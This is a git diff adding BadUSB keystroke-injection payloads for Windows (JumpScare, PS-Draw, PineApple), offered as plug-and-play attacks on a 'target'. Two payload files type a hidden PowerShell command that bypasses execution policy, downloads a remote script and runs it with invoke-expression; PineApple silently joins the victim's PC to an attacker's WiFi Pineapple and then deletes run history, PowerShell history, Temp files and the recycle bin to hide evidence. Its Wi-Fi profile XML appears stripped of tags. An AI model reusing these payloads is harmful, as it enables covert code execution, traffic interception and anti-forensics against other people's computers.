diff --git a/Payloads/Flip-JumpScare/female_scream.wav b/Payloads/Flip-JumpScare/female_scream.wav
new file mode 100644
index 0000000..67fce05
Binary files /dev/null and b/Payloads/Flip-JumpScare/female_scream.wav differ
diff --git a/Payloads/Flip-JumpScare/jumpscare.png b/Payloads/Flip-JumpScare/jumpscare.png
new file mode 100644
index 0000000..36c4cdb
Binary files /dev/null and b/Payloads/Flip-JumpScare/jumpscare.png differ
diff --git a/Payloads/Flip-JumpScare/payload.txt b/Payloads/Flip-JumpScare/payload.txt
new file mode 100644
index 0000000..9973b8b
--- /dev/null
+++ b/Payloads/Flip-JumpScare/payload.txt
@@ -0,0 +1,23 @@
+REM Title: JumpScare
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Start by minimizing all their current windows
+GUI m
+DELAY 500
+REM
+REM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/Flip-PS-Draw/Images/PS-Draw.jpg b/Payloads/Flip-PS-Draw/Images/PS-Draw.jpg
new file mode 100644
index 0000000..78f7d5f
Binary files /dev/null and b/Payloads/Flip-PS-Draw/Images/PS-Draw.jpg differ
diff --git a/Payloads/Flip-PS-Draw/Images/images b/Payloads/Flip-PS-Draw/Images/images
new file mode 100644
index 0000000..b66011e
--- /dev/null
+++ b/Payloads/Flip-PS-Draw/Images/images
@@ -0,0 +1 @@
+images will be stored here
diff --git a/Payloads/Flip-PS-Draw/Images/omg-ico.png b/Payloads/Flip-PS-Draw/Images/omg-ico.png
new file mode 100644
index 0000000..d967bba
Binary files /dev/null and b/Payloads/Flip-PS-Draw/Images/omg-ico.png differ
diff --git a/Payloads/Flip-PS-Draw/Images/ps-colors.jpg b/Payloads/Flip-PS-Draw/Images/ps-colors.jpg
new file mode 100644
index 0000000..f865281
Binary files /dev/null and b/Payloads/Flip-PS-Draw/Images/ps-colors.jpg differ
diff --git a/Payloads/Flip-PS-Draw/Images/ps-hak5.jpg b/Payloads/Flip-PS-Draw/Images/ps-hak5.jpg
new file mode 100644
index 0000000..30b6644
Binary files /dev/null and b/Payloads/Flip-PS-Draw/Images/ps-hak5.jpg differ
diff --git a/Payloads/Flip-PS-Draw/Images/ps-omg.jpg b/Payloads/Flip-PS-Draw/Images/ps-omg.jpg
new file mode 100644
index 0000000..cef9357
Binary files /dev/null and b/Payloads/Flip-PS-Draw/Images/ps-omg.jpg differ
diff --git a/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1 b/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1
new file mode 100644
index 0000000..12d83e8
--- /dev/null
+++ b/Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1
@@ -0,0 +1,232 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
+ To increase the size of the pixels add more spaces to the following Write-Host command.
+ Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
+
+.DESCRIPTION
+ This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
+
+.SYNTAX
+ $col | PS-Draw
+ $hak5 | PS-Draw
+ $omg | PS-Draw
+ PS-Draw -Image $col
+ PS-Draw -Image $hak5
+ PS-Draw -Image $omg
+#>
+############################################################################################################################################################
+
+$Colors = @{
+ 1 = 'White'
+ 2 = 'Black'
+ 3 = 'DarkBlue'
+ 4 = 'DarkGreen'
+ 5 = 'DarkCyan'
+ 6 = 'DarkRed'
+ 7 = 'DarkMagenta'
+ 8 = 'DarkYellow'
+ 9 = 'Gray'
+ 10 = 'DarkGray'
+ 11 = 'Blue'
+ 12 = 'Green'
+ 13 = 'Cyan'
+ 14 = 'Red'
+ 15 = 'Magenta'
+ 16 = 'Yellow'
+}
+
+ #Show available colors
+$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
+ @(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
+ @(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
+ @(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
+ @(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
+ @(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
+ @(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
+ @(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
+ @(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
+ @(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
+ @(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
+ @(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
+ @(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
+ @(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
+ @(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
+
+
+$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
+ @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
+ @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
+ @(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
+ @(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
+
+
+$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
+ @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
+
+# -------------------------------------------------------------------------------------------
+
+
+function PS-Draw {
+ [CmdletBinding()]
+ param (
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("I")]
+ [object[]]$Image
+ )
+
+ # if the data is sent through the pipeline, use $input to collect is as array
+ if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
+ #$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
+
+ cls
+
+ foreach ($row in $Image) {
+ foreach ($position in $row) {
+ Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
+ Start-Sleep -m 10
+ }
+ Write-Host ""
+ }
+}
+
+<#
+
+.NOTES
+ This will get either the targets full name associated with the registered microsoft account
+ or it will default to grabbing the username of the account to use as a greeting for this script
+#>
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+# -------------------------------------------------------------------------------------------
+
+# Get name to be used in greeting
+
+cls
+
+$fullName = Get-fullName
+
+echo "Hello $fullName"
+
+# -------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue theipt
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+
+<#
+
+.NOTES
+ This is where you call the function to draw out one of the images above
+ $col - to see the available colors you can use for a custom image
+ $hak5 - this will draw out the hak5 five logo
+ $omg - this will draw out the omg logo
+#>
+
+# -------------------------------------------------------------------------------------------
+
+# Call function with one of the arrays listed above to generate an image
+
+$hak5 | PS-Draw
+
+
diff --git a/Payloads/Flip-PS-Draw/PS-Draw.ps1 b/Payloads/Flip-PS-Draw/PS-Draw.ps1
new file mode 100644
index 0000000..af92497
--- /dev/null
+++ b/Payloads/Flip-PS-Draw/PS-Draw.ps1
@@ -0,0 +1,201 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
+ well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels
+ To increase the size of the pixels add more spaces to the following Write-Host command.
+ Write-Host " " -NoNewline -BackgroundColor $BackGround
+
+.DESCRIPTION
+ This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
+ that can be used in powershell. Finally that image will be drawn in a powershell window.
+
+.SYNTAX
+ "$env:TMP\omg-ico.png" | PS-Draw
+ PS-Draw -Path "$env:TMP\omg-ico.png"
+#>
+############################################################################################################################################################
+
+Function PS-Draw
+{
+ param(
+ [String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
+ [Switch] $ToASCII
+ )
+ Begin
+ {
+ [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
+
+ # Console Colors and their Hexadecimal values
+ $Colors = @{
+ 'FFFFFFFF' = 'White'
+ 'FF000000' = 'Black'
+ 'FF000080' = 'DarkBlue'
+ 'FF008000' = 'DarkGreen'
+ 'FF008080' = 'DarkCyan'
+ 'FF800000' = 'DarkRed'
+ 'FF800080' = 'DarkMagenta'
+ 'FF808000' = 'DarkYellow'
+ 'FFC0C0C0' = 'Gray'
+ 'FF808080' = 'DarkGray'
+ 'FF0000FF' = 'Blue'
+ 'FF00FF00' = 'Green'
+ 'FF00FFFF' = 'Cyan'
+ 'FFFF0000' = 'Red'
+ 'FFFF00FF' = 'Magenta'
+ 'FFFFFF00' = 'Yellow'
+
+ }
+
+ # Algorithm to calculate closest Console color (Only 16) to a color of Pixel
+ Function Get-ClosestConsoleColor($PixelColor)
+ {
+ ($(foreach ($item in $Colors.Keys) {
+ [pscustomobject]@{
+ 'Color' = $Item
+ 'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
+ }
+ }) | Sort-Object Diff)[0].color
+ }
+ }
+ Process
+ {
+ Foreach($item in $Path)
+ {
+ #Convert Image to BitMap
+ $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
+
+ Foreach($y in (1..($BitMap.Height-1)))
+ {
+ Foreach($x in (1..($BitMap.Width-1)))
+ {
+ $Pixel = $BitMap.GetPixel($X,$Y)
+ $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
+
+
+ If($ToASCII) # Condition to check ToASCII switch
+ {
+ Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
+ }
+ else
+ {
+ Write-Host " " -NoNewline -BackgroundColor $BackGround
+ }
+ }
+ Write-Host '' # Blank write-host to Start the next row
+ }
+ }
+
+ }
+ end
+ {
+
+ }
+
+}
+
+<#
+
+.NOTES
+ This will get either the targets full name associated with the registered microsoft account
+ or it will default to grabbing the username of the account to use as a greeting for this script
+#>
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+# -------------------------------------------------------------------------------------------
+# Download the image from wherever you are hosting it
+
+iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
+
+# -------------------------------------------------------------------------------------------
+
+# Get name to use in the greeting
+
+cls
+
+$fullName = Get-fullName
+
+echo "Hello $fullName"
+# -------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue theipt
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+
+
+<#
+
+.NOTES
+ This is where you call the function to draw out your image
+ Replace the path below with the path of your image
+
+.SYNTAX
+ "$env:TMP\omg-ico.png" | PS-Draw
+ PS-Draw -Path "$env:TMP\omg-ico.png"
+#>
+
+# -------------------------------------------------------------------------------------------
+
+# Call the function with the image you'd like to have drawn here
+
+"$env:TMP\omg-ico.png" | PS-Draw
+
diff --git a/Payloads/Flip-PS-Draw/README.md b/Payloads/Flip-PS-Draw/README.md
new file mode 100644
index 0000000..bf42754
--- /dev/null
+++ b/Payloads/Flip-PS-Draw/README.md
@@ -0,0 +1,132 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# PS-Draw
+
+A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
+
+## Description
+
+These two programs use two different method to draw out images in the Powershell Window.
+PS-Draw will convert an image you download into a BMP file estiamte the used colors based off the 16 available powershell colors
+then draw your image out in the powershell window. This process is not exact and needed testing of multiple images to find one that works well.
+
+PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
+These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
+
+After the images are generated, a greeting will be generated by grabbing either the name associated with the registered microsoft account or the
+UserName environment variable.
+The script will then be paused until a mouse movement is detected at which time the pre selected image will be drawn out in the powershell window.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or another image hosting service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your Device
+* Invoke-WebRequest will be used to download the image
+
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1
+```
+* The image will be converted into a BMP file
+* An algorithm will be used to find the closest matching colors available in the powershell window
+* The image will be generated in the powershell window
+
+This is an example of an image I used with the PS-Draw command
+
+
+
+This is how the iamge is interpreted and drawn out
+
+
+* The PS-Custom-Draw operates a little differently
+* One of the preconfigured arrays is piped into the command to generate an image
+
+* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
+
+
+
+
+* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
+
+
+
+
+* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
+
+
+
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-PS-Draw)
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-PS-Draw/payload.txt b/Payloads/Flip-PS-Draw/payload.txt
new file mode 100644
index 0000000..c7f2762
--- /dev/null
+++ b/Payloads/Flip-PS-Draw/payload.txt
@@ -0,0 +1,17 @@
+REM Title: PS-Draw
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remember to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM Download one of the two PS-Draw Execute files provided and execute it
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/Flip-PineApple/PineApple-KeyInjection.txt b/Payloads/Flip-PineApple/PineApple-KeyInjection.txt
new file mode 100644
index 0000000..33e0595
--- /dev/null
+++ b/Payloads/Flip-PineApple/PineApple-KeyInjection.txt
@@ -0,0 +1,79 @@
+REM Title: PineApple
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version is a direct key stroke injection attack
+REM Author: I am Jakoby
+REM Target: Windows 10, 11
+REM
+DELAY 1000
+REM
+REM If the wifi pineapple SSID is detected target PC will connect to it
+REM
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+REM
+DELAY 1000
+REM
+STRING $profilefile="Home.xml";
+SHIFT ENTER
+STRING $SSID="PineApple";
+SHIFT ENTER
+STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+SHIFT ENTER
+DELAY 500
+STRING $xmlfile="
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSIDHEX
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING ESS
+SHIFT ENTER
+STRING manual
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING open
+SHIFT ENTER
+STRING none
+SHIFT ENTER
+STRING false
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING "
+SHIFT ENTER
+STRING $XMLFILE > ($profilefile)
+SHIFT ENTER
+STRING netsh wlan add profile filename="$($profilefile)"
+SHIFT ENTER
+STRING netsh wlan connect name=$SSID
+SHIFT ENTER
+STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
+REM
+DELAY 500
+ENTER
diff --git a/Payloads/Flip-PineApple/PineApple.ps1 b/Payloads/Flip-PineApple/PineApple.ps1
new file mode 100644
index 0000000..7f4628a
--- /dev/null
+++ b/Payloads/Flip-PineApple/PineApple.ps1
@@ -0,0 +1,52 @@
+$profilefile="Home.xml"
+$SSID="PineApple"
+$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+$xmlfile="
+
+$SSID
+
+
+$SSIDHEX
+$SSID
+
+
+ESS
+manual
+
+
+
+open
+none
+false
+
+
+
+
+"
+$XMLFILE > ($profilefile)
+netsh wlan add profile filename="$($profilefile)"
+netsh wlan connect name=$SSID
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/Flip-PineApple/README.md b/Payloads/Flip-PineApple/README.md
new file mode 100644
index 0000000..fc45602
--- /dev/null
+++ b/Payloads/Flip-PineApple/README.md
@@ -0,0 +1,95 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# PineApple
+
+A script used to connect a targets PC to your wifi PineApple
+
+## Description
+
+This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
+The XML file will be manually entered into a powershell window
+the powershell window and run box will be erased for a clean exit.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* The entire script will be manually entered into the powershell window
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
